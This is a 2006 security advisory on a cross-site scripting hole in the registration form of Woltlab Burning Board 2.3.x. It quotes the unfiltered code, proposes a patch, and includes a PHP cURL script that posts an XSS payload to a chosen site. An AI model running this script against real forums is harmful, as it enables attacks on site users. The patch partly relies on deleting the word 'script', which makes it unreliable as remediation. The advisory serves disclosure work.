Woltlab Burning Board 2.3.X XSS Vulnerability (0-Day) FIXED VERSION

blueshisha@xxxxxxxxxxxxx · 30 Nov 2006 18:28:50 -0000

#############################################################

Woltlab Burning Board 2.3.X "register.php" XSS Vulnerability

#############################################################

[==- Release Status -==]

 Released (30.11.2006)

[==- Vendor Status -==] 

 The vendor hasn't been contacted yet.

[==- Found by: -==]

 666 [www.SR-Crew.org]

[==- Vulnerability: -==]

((( register.php | Near line 162 )))

------------------------------------------

if (isset($_POST['r_dateformat'])) $r_dateformat = wbb_trim($_POST['r_dateformat']);

------------------------------------------

The variable "$r_dateformat" isn't filtered.

[==- Bugfix: -==]

((( Search )))

------------------------------------------

if (isset($_POST['r_dateformat'])) $r_dateformat = wbb_trim($_POST['r_dateformat']);[/php]

------------------------------------------

((( Replace with )))

------------------------------------------

if (isset($_POST['r_dateformat'])) $r_dateformat = wbb_trim($_POST['r_dateformat']);
$r_dateformat = htmlspecialchars($r_dateformat);
$r_dateformat = str_replace("script","",$r_dateformat);

------------------------------------------

[==- Example Exploit (using cURL) -==]

------------------------------------------

<?
$url = 'http://www.yoursite.com/wbb2/';
$length    = 5;
$key_chars = '123456789';
$rand_max  = strlen($key_chars) - 1;

for ($i = 0; $i < $length; $i++)
{
   $rand_pos  = rand(0, $rand_max);
   $rand_key[] = $key_chars{$rand_pos};
}

$rand = implode('', $rand_key);
$ch = curl_init();
curl_setopt($ch , CURLOPT_USERAGENT, $rand);
curl_setopt($ch , CURLOPT_URL , ''.$url.'register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'r_username=aaaaaaaaa&r_email=aaaaaaaaa&r_password=aaaaaaaaa&r_confirmpassword=aaaaaaaaa&key_string=&key_number=1521&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiw
 yg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed');
curl_exec($ch);
curl_close($ch);
?>

------------------------------------------

// 666 -- blueshisha [at] safe-mail [dot] net

[====== EOF ======]